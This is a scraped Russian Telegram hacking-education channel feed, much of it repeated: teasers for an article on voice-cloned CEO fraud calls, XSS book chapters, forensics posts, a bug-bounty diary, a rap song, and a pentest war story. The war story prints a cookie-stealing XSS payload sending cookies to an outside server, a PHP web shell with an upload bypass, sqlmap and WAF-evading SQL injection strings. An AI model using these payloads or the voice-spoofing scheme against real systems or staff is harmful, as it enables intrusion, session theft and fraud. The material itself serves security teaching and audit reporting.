Forwarded from Разработка роботов и эксплойтов. Михаил Тарасов
#social_engineering
#voice_spoofing
Голосовой спуфинг: создаём фейковые звонки для обмана сотрудников
Представь: секретарша компании получает звонок от “директора”. Голос один в один, интонации знакомые, даже манера речи та же. Она переводит $50k на “срочный контракт”. Только вот директор в это время был на рыбалке без телефона. Добро пожаловать в эру voice spoofing — когда технология клонирования голоса встречается с социальной инженерией.
Подробнее: https://timrobot.ru/golosovoj-spufing-sozdayom-fejkovye-zvonki-dlya-obmana-sotrudnikov/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
#voice_spoofing
Голосовой спуфинг: создаём фейковые звонки для обмана сотрудников
Представь: секретарша компании получает звонок от “директора”. Голос один в один, интонации знакомые, даже манера речи та же. Она переводит $50k на “срочный контракт”. Только вот директор в это время был на рыбалке без телефона. Добро пожаловать в эру voice spoofing — когда технология клонирования голоса встречается с социальной инженерией.
Подробнее: https://timrobot.ru/golosovoj-spufing-sozdayom-fejkovye-zvonki-dlya-obmana-sotrudnikov/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Разработка роботов и эксплойтов
Голосовой спуфинг: создаём фейковые звонки для обмана сотрудников - Разработка роботов и эксплойтов
Представь: секретарша компании получает звонок от “директора”. Голос один в один, интонации знакомые, даже манера речи та же. Она переводит $50k на “срочный контракт”. Только вот директор в это время был на рыбалке без телефона. Добро пожаловать в эру voice…
🔥 Дневник Хакера | Первый Bug Bounty репорт в новой программе
24.10.2025
Что тестировал 🎯
❌ IDOR на User endpoints → SPA routing блокирует, защита работает
❌ Self-referral attack → Защита есть, ref_balance не изменился
✅ Email Verification Bypass → Нашёл уязвимость! 🔍
Суть находки 💡
После регистрации система отправляет email подтверждения, но НЕ требует его для доступа к функционалу.
Response:
{
"activated": false, // Email не подтверждён
"demo_balance": "3000.00", // Но средства доступны
"is_partner": true // Статус активен
}
+ sessionid cookie // Сессия выдана
Impact 💣
1. Email Bombing:
Регистрация 1000+ аккаунтов с email жертвы → спам-флуд
2. Identity Bypass:
Можно использовать ЛЮБОЙ email без подтверждения владения
3. Mass Fake Accounts:
Неограниченные фейковые аккаунты для манипуляций
4. Compliance Issues:
Нарушение KYC/AML для gambling платформ
Классификация 📊
CWE-287: Improper Authentication
CVSS: 5.0 (Medium)
Severity: Средний
Expected bounty: $300-750 USDT 💰
Почему это НЕ “best practice”? 🤔
Программа исключает:
“Отсутствие 2FA/email при изменении данных в активной сессии”
Моя находка:
✅ Про ОТСУТСТВИЕ верификации при регистрации
✅ 5 конкретных attack scenarios
✅ Доказанное влияние на безопасность
✅ Подходит под скоуп программы!
Статистика 📈
⏱ Времени: ~5 часов
🔍 Векторов протестировано: 8
✅ Найдено уязвимостей: 1 (Medium)
📝 Репортов отправлено: 1
💰 Потенциал: $300-750 USDT
Главный урок дня 📚
1 качественный репорт с детальным impact analysis
10 слабых находок без доказательств
В Bug Bounty платят за качество, а не за количество! 🎯
Что в репорте 📋
✅ Детальное описание уязвимости
✅ 5 attack scenarios с примерами
✅ Impact assessment
✅ PoC с screenshots из Burp
✅ HTTP Request/Response
✅ Рекомендации по исправлению
✅ Ссылки на стандарты (OWASP, CWE, NIST)
Выводы 💭
Что работает:
✅ Ручное тестирование > автоматизация
✅ Понимание контекста и impact
✅ Профессиональная документация
Что не сработало:
❌ IDOR на очевидных путях
❌ Базовые self-referral атаки
Next Steps 🚀
Ожидание ответа: до 5 рабочих дней
Шанс приёмки: ~60-70%
Продолжение следует… 💪
#BugBounty #InfoSec #Pentesting #CWE287 #ResponsibleDisclosure
24.10.2025
Что тестировал 🎯
❌ IDOR на User endpoints → SPA routing блокирует, защита работает
❌ Self-referral attack → Защита есть, ref_balance не изменился
✅ Email Verification Bypass → Нашёл уязвимость! 🔍
Суть находки 💡
После регистрации система отправляет email подтверждения, но НЕ требует его для доступа к функционалу.
Response:
{
"activated": false, // Email не подтверждён
"demo_balance": "3000.00", // Но средства доступны
"is_partner": true // Статус активен
}
+ sessionid cookie // Сессия выдана
Impact 💣
1. Email Bombing:
Регистрация 1000+ аккаунтов с email жертвы → спам-флуд
2. Identity Bypass:
Можно использовать ЛЮБОЙ email без подтверждения владения
3. Mass Fake Accounts:
Неограниченные фейковые аккаунты для манипуляций
4. Compliance Issues:
Нарушение KYC/AML для gambling платформ
Классификация 📊
CWE-287: Improper Authentication
CVSS: 5.0 (Medium)
Severity: Средний
Expected bounty: $300-750 USDT 💰
Почему это НЕ “best practice”? 🤔
Программа исключает:
“Отсутствие 2FA/email при изменении данных в активной сессии”
Моя находка:
✅ Про ОТСУТСТВИЕ верификации при регистрации
✅ 5 конкретных attack scenarios
✅ Доказанное влияние на безопасность
✅ Подходит под скоуп программы!
Статистика 📈
⏱ Времени: ~5 часов
🔍 Векторов протестировано: 8
✅ Найдено уязвимостей: 1 (Medium)
📝 Репортов отправлено: 1
💰 Потенциал: $300-750 USDT
Главный урок дня 📚
1 качественный репорт с детальным impact analysis
10 слабых находок без доказательств
В Bug Bounty платят за качество, а не за количество! 🎯
Что в репорте 📋
✅ Детальное описание уязвимости
✅ 5 attack scenarios с примерами
✅ Impact assessment
✅ PoC с screenshots из Burp
✅ HTTP Request/Response
✅ Рекомендации по исправлению
✅ Ссылки на стандарты (OWASP, CWE, NIST)
Выводы 💭
Что работает:
✅ Ручное тестирование > автоматизация
✅ Понимание контекста и impact
✅ Профессиональная документация
Что не сработало:
❌ IDOR на очевидных путях
❌ Базовые self-referral атаки
Next Steps 🚀
Ожидание ответа: до 5 рабочих дней
Шанс приёмки: ~60-70%
Продолжение следует… 💪
#BugBounty #InfoSec #Pentesting #CWE287 #ResponsibleDisclosure
007
timcore
Новый трек 🎶🎶🎶
007
Эй, агент в деле, код-имя ноль-семь
Проникаю в систему, как тень в ночи всем
Чёрный костюм, шифрованный файл
Миссия секретна — взломать этот стайл
Куплет 1
Двойной ноль — это не просто цифра в сети
Это уровень доступа, куда не всем войти
Сканирую порты, ищу уязвимость
Каждый баг — это шанс показать мою сильность
Мартини не пью, предпочитаю чай
Но как Бонд в киберпространстве — не проиграй
Пентест за пентестом, отчёт за отчётом
Баунти программы — работаю с учётом
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 2
В тени работаю, но репутация чиста
Белая шляпа на голове — вот моя мечта
Vulnerability Disclosure — мой протокол
Нашёл эксплойт — отправил на стол
Gadgets не Q, а Burp Suite в руках
Interceptor Proxy — враг в облаках
SQLi, XSS — знаю все их слабости
Пишу PoC с технической грамотностью
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 3
Восемь лет в игре, но всё ещё голоден
Каждый таргет — это новый уровень, я молод и
Полон энергии, как zero-day в дикой природе
Нахожу уязвимости в любой погоде
Bug bounty hunter — моя лицензия на kill
Баги, не людей, — вот мой главный скилл
IDOR, SSRF — коллекция трофеев
Рейтинг растёт, а я становлюсь смелее
VK блог — двадцать три тысячи следят
За каждым моим шагом, за каждым из атак
Образовательный контент — моё оружие
Делюсь знаниями, строю киберсообщество
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 4
AI системы думали, что неуязвимы
Но prompt injection — мои стрелы невидимы
Джейлбрейк нейронок — это новый фронт
Тестирую GPT, Claude — полный расклад тут
От Parrot OS до Kali — мой арсенал
Python скрипты пишу, как будто ритуал
Автоматизация — ключ к эффективности
SGOHunter в деле — символ активности
Миссия продолжается, цель не достигнута
Пока есть баги — буду в строю, это истина
Агент 007 киберпространства
Защищаю сети — это моё царство!
007
Эй, агент в деле, код-имя ноль-семь
Проникаю в систему, как тень в ночи всем
Чёрный костюм, шифрованный файл
Миссия секретна — взломать этот стайл
Куплет 1
Двойной ноль — это не просто цифра в сети
Это уровень доступа, куда не всем войти
Сканирую порты, ищу уязвимость
Каждый баг — это шанс показать мою сильность
Мартини не пью, предпочитаю чай
Но как Бонд в киберпространстве — не проиграй
Пентест за пентестом, отчёт за отчётом
Баунти программы — работаю с учётом
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 2
В тени работаю, но репутация чиста
Белая шляпа на голове — вот моя мечта
Vulnerability Disclosure — мой протокол
Нашёл эксплойт — отправил на стол
Gadgets не Q, а Burp Suite в руках
Interceptor Proxy — враг в облаках
SQLi, XSS — знаю все их слабости
Пишу PoC с технической грамотностью
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 3
Восемь лет в игре, но всё ещё голоден
Каждый таргет — это новый уровень, я молод и
Полон энергии, как zero-day в дикой природе
Нахожу уязвимости в любой погоде
Bug bounty hunter — моя лицензия на kill
Баги, не людей, — вот мой главный скилл
IDOR, SSRF — коллекция трофеев
Рейтинг растёт, а я становлюсь смелее
VK блог — двадцать три тысячи следят
За каждым моим шагом, за каждым из атак
Образовательный контент — моё оружие
Делюсь знаниями, строю киберсообщество
Припев
Семь попыток, семь побед
Семь серверов — оставлю след
Ноль сомнений, ноль потерь
Агент 007 — открыта дверь
Куплет 4
AI системы думали, что неуязвимы
Но prompt injection — мои стрелы невидимы
Джейлбрейк нейронок — это новый фронт
Тестирую GPT, Claude — полный расклад тут
От Parrot OS до Kali — мой арсенал
Python скрипты пишу, как будто ритуал
Автоматизация — ключ к эффективности
SGOHunter в деле — символ активности
Миссия продолжается, цель не достигнута
Пока есть баги — буду в строю, это истина
Агент 007 киберпространства
Защищаю сети — это моё царство!
#blog
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀 • Reflected XSS (Отражённый): быстро, грязно, одноразово
Если бы XSS раздавали по типам личности, Reflected XSS был бы уличным гопником — дерзким, быстрым, но редко оставляет следы после драки. Это та атака, которую ты можешь провернуть за пару минут на любом полу-сыро написанном сайте, не беспокоясь о массовых заражениях или сложных цепочках. Раздел для тех, кто любит быстрые победы и легкую грязь на руках.
https://vk.com/@hacker_timcore-kniga-vse-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀 • Reflected XSS (Отражённый): быстро, грязно, одноразово
Если бы XSS раздавали по типам личности, Reflected XSS был бы уличным гопником — дерзким, быстрым, но редко оставляет следы после драки. Это та атака, которую ты можешь провернуть за пару минут на любом полу-сыро написанном сайте, не беспокоясь о массовых заражениях или сложных цепочках. Раздел для тех, кто любит быстрые победы и легкую грязь на руках.
https://vk.com/@hacker_timcore-kniga-vse-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
VK
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀 • Reflected XSS (Отражённый): быстро, грязно, одноразово
Если бы XSS раздавали по типам личности, Reflected XSS был бы уличным гопником — дерзким, быстрым, но редко оставляет следы после драки...
#blog
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Stored XSS (Хранимый): Подарок, который продолжает дарить
Если Reflected XSS — это быстрая кража на улице, то Stored XSS — это тайник в стене сайта, который остаётся активным сутками, месяцами, а иногда даже годами, пока не сработает для кого-то важного. Хранимый XSS — это тот редкий случай, когда твоя атака превращается в массовый инструмент для захвата, шпионажа и тотального уничтожения пользовательских данных. В этом разделе разберём, почему она — самая опасная и желанная находка для любого эксплойтера.
https://vk.com/@hacker_timcore-kniga-se-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Stored XSS (Хранимый): Подарок, который продолжает дарить
Если Reflected XSS — это быстрая кража на улице, то Stored XSS — это тайник в стене сайта, который остаётся активным сутками, месяцами, а иногда даже годами, пока не сработает для кого-то важного. Хранимый XSS — это тот редкий случай, когда твоя атака превращается в массовый инструмент для захвата, шпионажа и тотального уничтожения пользовательских данных. В этом разделе разберём, почему она — самая опасная и желанная находка для любого эксплойтера.
https://vk.com/@hacker_timcore-kniga-se-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
VK
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Stored XSS (Хранимый): Подарок, который продолжает дарить
Если Reflected XSS — это быстрая кража на улице, то Stored XSS — это тайник в стене сайта, который остаётся активным сутками, месяцами, а..
#blog
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS переносит игру на новый уровень. Здесь зломышленник общается не с сервером, а с самим браузером и его JavaScript-кодом. Вся магия происходит уже после того, как пользователь загрузил страницу. Это современный, коварный, и зачастую невидимый для стандартных защит тип уязвимости. Добро пожаловать в адскую смесь легаси-джаваскрипта, фреймворков и client-side багов.
https://vk.com/@hacker_timcore-kniga-ve-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS переносит игру на новый уровень. Здесь зломышленник общается не с сервером, а с самим браузером и его JavaScript-кодом. Вся магия происходит уже после того, как пользователь загрузил страницу. Это современный, коварный, и зачастую невидимый для стандартных защит тип уязвимости. Добро пожаловать в адскую смесь легаси-джаваскрипта, фреймворков и client-side багов.
https://vk.com/@hacker_timcore-kniga-ve-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
VK
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS перенос..
Эй, хакеры, кодеры и те, кто рвётся в мир эксплойтов! 🔥
Я — Михаил Тарасов (Timcore), и я решил прокачать Вашу библиотеку знаний. Бесплатно раздаю 9 своих авторских книг по хакингу, CTF, уязвимостям и программированию. Это не вода — это чистый хардкор: от SQL-инъекций до Rust-хаков. Хочешь прокачать скиллы и ломать системы как профи? Лови шанс, пока не поздно!
Вот что ты получишь в рассылке (PDF формат):
1. Capture the Flag (CTF). VulnHub 8 райтапов — Реальные walkthroughs для тренировок на VulnHub.
2. Cross Site Request Forgery — Как эксплуатировать CSRF и защищаться от него.
3. Программирование на Go для начинающих — Быстрый старт в Go для автоматизации.
4. Программирование на PHP8 для начинающих — Современный PHP для веб-эксплойтов.
5. Программирование на С для начинающих — База для low-level хаков.
6. Прохождение CTF Мистер Робот Практический курс — Шаг за шагом по легендарному CTF.
7. Уязвимость SQL-инъекция. Практическое руководство для хакеров — Эксплойты SQLi в действии.
8. Уязвимость-Cross-Site-Scripting-XSS-Практическое-руководство — XSS от А до Я, с примерами.
9. Хакинг на Rust — Безопасный и мощный Rust для пентеста.
Это не просто книги — это твои инструменты для доминирования в CTF, поиска уязвимостей и создания своих эксплойтов. Я написал их на основе реального опыта: ломал, фиксил, учил других. Бесплатно? Да, потому что знания должны быть доступны. Но только для тех, кто готов действовать!
Как забрать? по контакту в телеграм: @timcore1: "Хочу книги Timcore" — и я пришлю ссылку на скачивание. Не тяни, раздача ограничена!
#хакинг #CTF #эксплойты #программирование #Timcore
Поделись с друзьями — пусть все прокачаются! 🚀
Я — Михаил Тарасов (Timcore), и я решил прокачать Вашу библиотеку знаний. Бесплатно раздаю 9 своих авторских книг по хакингу, CTF, уязвимостям и программированию. Это не вода — это чистый хардкор: от SQL-инъекций до Rust-хаков. Хочешь прокачать скиллы и ломать системы как профи? Лови шанс, пока не поздно!
Вот что ты получишь в рассылке (PDF формат):
1. Capture the Flag (CTF). VulnHub 8 райтапов — Реальные walkthroughs для тренировок на VulnHub.
2. Cross Site Request Forgery — Как эксплуатировать CSRF и защищаться от него.
3. Программирование на Go для начинающих — Быстрый старт в Go для автоматизации.
4. Программирование на PHP8 для начинающих — Современный PHP для веб-эксплойтов.
5. Программирование на С для начинающих — База для low-level хаков.
6. Прохождение CTF Мистер Робот Практический курс — Шаг за шагом по легендарному CTF.
7. Уязвимость SQL-инъекция. Практическое руководство для хакеров — Эксплойты SQLi в действии.
8. Уязвимость-Cross-Site-Scripting-XSS-Практическое-руководство — XSS от А до Я, с примерами.
9. Хакинг на Rust — Безопасный и мощный Rust для пентеста.
Это не просто книги — это твои инструменты для доминирования в CTF, поиска уязвимостей и создания своих эксплойтов. Я написал их на основе реального опыта: ломал, фиксил, учил других. Бесплатно? Да, потому что знания должны быть доступны. Но только для тех, кто готов действовать!
Как забрать? по контакту в телеграм: @timcore1: "Хочу книги Timcore" — и я пришлю ссылку на скачивание. Не тяни, раздача ограничена!
#хакинг #CTF #эксплойты #программирование #Timcore
Поделись с друзьями — пусть все прокачаются! 🚀
#forensics
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.
Подробнее: https://timforensics.ru/setevoj-potroshitel-kak-vskryt-trafik-i-uvidet-vsyo-chto-lezet-v-tvoj-internet-i-iz-nego/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.
Подробнее: https://timforensics.ru/setevoj-potroshitel-kak-vskryt-trafik-i-uvidet-vsyo-chto-lezet-v-tvoj-internet-i-iz-nego/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Форензика
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него | Форензика
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей
#forensics
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.
Подробнее: https://timforensics.ru/kiber-apokalipsis-na-zavode-forenzika-promyshlennyh-sistem-ics-scada/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.
Подробнее: https://timforensics.ru/kiber-apokalipsis-na-zavode-forenzika-promyshlennyh-sistem-ics-scada/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Форензика
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA) | Форензика
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один
🔍 ДНЕВНИК ХАКЕРА | Как я взломал корпоративный сайт за 4 часа (под NDA, но расскажу) 💻🔥
Привет, банда! Сегодня история из моей практики — реальный аудит безопасности коммерческого проекта. Имена и домены не светлю (NDA жёстче, чем файрвол Cisco), но сценарий покажу во всей красе 😎.
🎯 Как всё началось: клиент в панике
Звонок в 10 утра: «У нас веб-приложение для финтеха, нужен срочный пентест перед запуском». Говорю: «Окей, давайте scope и доступ». Получаю staging-среду, логин-пароль от тестового аккаунта и напутствие: «Только не роняйте прод, пожалуйста» 😅 .
🔍 Разведка: первые 30 минут
Захожу на сайт — сразу включаю Burp Suite, ставлю на перехват всего трафика. Кликаю по функциям: регистрация, логин, профиль, транзакции. Смотрю на запросы — и тут БАЦ! Вижу параметр
Думаю: «Это же классический IDOR, ребят, вы серьёзно?». Меняю
💀 Копаем глубже: SQL-инъекция как десерт
Дальше проверяю форму поиска транзакций. Ввожу
sqlmap -u "https://target.com/transactions?date=2025-01-01" --dbs --batch
За 10 минут дамплю список баз данных:
🔐 XSS + Session Hijacking: комбо для красоты
Захожу в раздел «Комментарии к платежам». Закидываю туда
<script>document.location='http://myserver.com/?c='+document.cookie</script>
Обновляю страницу от имени админа (через тестовый доступ) — и вижу, как мой сервер получил сессионную куку 🍪. HttpOnly флага нет, Secure тоже. Красота! Теперь можно перехватить сессию реального юзера через XSS.
🚀 File Upload: шелл за 5 минут
Есть функция загрузки документов для верификации аккаунта. Пробую залить PHP-шелл вместо PDF :
1. Создаю
<?php system($_GET['cmd']); ?>
2. Переименовываю в
3. Меняю MIME-тип через Burp на
Открываю
🛡 WAF bypass: потому что могу
На одном из этапов натыкаюсь на ModSecurity . Блочит стандартные SQL-пейлоады. Что делаю? Обфусцирую:
' uNiOn SeLeCt 1,2,3--
Или двойное кодирование:
%2527%20OR%201=1--
WAF пропускает — думаю: «Ну что за настройки из коробки, ребята» 😏.
📋 Финал: отчёт и рекомендации
Через 4 часа у меня список из 12 уязвимостей:
• 3 Critical (IDOR, SQL Injection, RCE через file upload) 🔥
• 5 High (XSS, Session Hijacking, CORS misconfiguration) ⚠️
• 4 Medium (информационные утечки, слабые пароли по дефолту) 📌
Собираю отчёт с PoC для каждой дыры, скриншотами и рекомендациями: «Используйте parameterized queries, проверяйте авторизацию на бэке, добавьте HttpOnly/Secure для кук». Отправляю клиенту. Ответ: «Мы в шоке. Спасибо, что не хакеры нашли первыми» 😅.
💡 Мораль: аудит — это не формальность
Каждый раз, когда кто-то говорит «у нас всё защищено», я вспоминаю этот кейс. OWASP Top 10 — это не миф, это реальность 2025 года. И да, если у вас нет пентеста перед запуском — вы просто ждёте, когда вас сломают 🚨.
P.S. Этот кейс под NDA, так что все детали обезличены. Но методология рабочая — можете тестировать на своих проектах (с разрешением, конечно) 😎🔥 .
Привет, банда! Сегодня история из моей практики — реальный аудит безопасности коммерческого проекта. Имена и домены не светлю (NDA жёстче, чем файрвол Cisco), но сценарий покажу во всей красе 😎.
🎯 Как всё началось: клиент в панике
Звонок в 10 утра: «У нас веб-приложение для финтеха, нужен срочный пентест перед запуском». Говорю: «Окей, давайте scope и доступ». Получаю staging-среду, логин-пароль от тестового аккаунта и напутствие: «Только не роняйте прод, пожалуйста» 😅 .
🔍 Разведка: первые 30 минут
Захожу на сайт — сразу включаю Burp Suite, ставлю на перехват всего трафика. Кликаю по функциям: регистрация, логин, профиль, транзакции. Смотрю на запросы — и тут БАЦ! Вижу параметр
user_id=1234 в URL при открытии личного кабинета 👀.Думаю: «Это же классический IDOR, ребят, вы серьёзно?». Меняю
1234 на 1235 — БАМ, открывается чужой профиль с данными карты, ФИО, балансом 💣. Скриншот, записал в блокнот — это уже Critical severity.💀 Копаем глубже: SQL-инъекция как десерт
Дальше проверяю форму поиска транзакций. Ввожу
' OR 1=1-- в поле даты — сайт выдаёт ошибку MySQL с названием таблицы 😂. Запускаю SQLMap:sqlmap -u "https://target.com/transactions?date=2025-01-01" --dbs --batch
За 10 минут дамплю список баз данных:
users, payments, admin_logs. Думаю: «Админы, вы вообще про prepared statements слышали?»🔐 XSS + Session Hijacking: комбо для красоты
Захожу в раздел «Комментарии к платежам». Закидываю туда
<script>document.location='http://myserver.com/?c='+document.cookie</script>
Обновляю страницу от имени админа (через тестовый доступ) — и вижу, как мой сервер получил сессионную куку 🍪. HttpOnly флага нет, Secure тоже. Красота! Теперь можно перехватить сессию реального юзера через XSS.
🚀 File Upload: шелл за 5 минут
Есть функция загрузки документов для верификации аккаунта. Пробую залить PHP-шелл вместо PDF :
1. Создаю
shell.php<?php system($_GET['cmd']); ?>
2. Переименовываю в
shell.php.pdf — не прошло.3. Меняю MIME-тип через Burp на
application/pdf — PROFIT! Файл залился 🎉.Открываю
https://target.com/uploads/shell.php?cmd=whoami — получаю ответ от сервера. Доступ к системе есть 💻.🛡 WAF bypass: потому что могу
На одном из этапов натыкаюсь на ModSecurity . Блочит стандартные SQL-пейлоады. Что делаю? Обфусцирую:
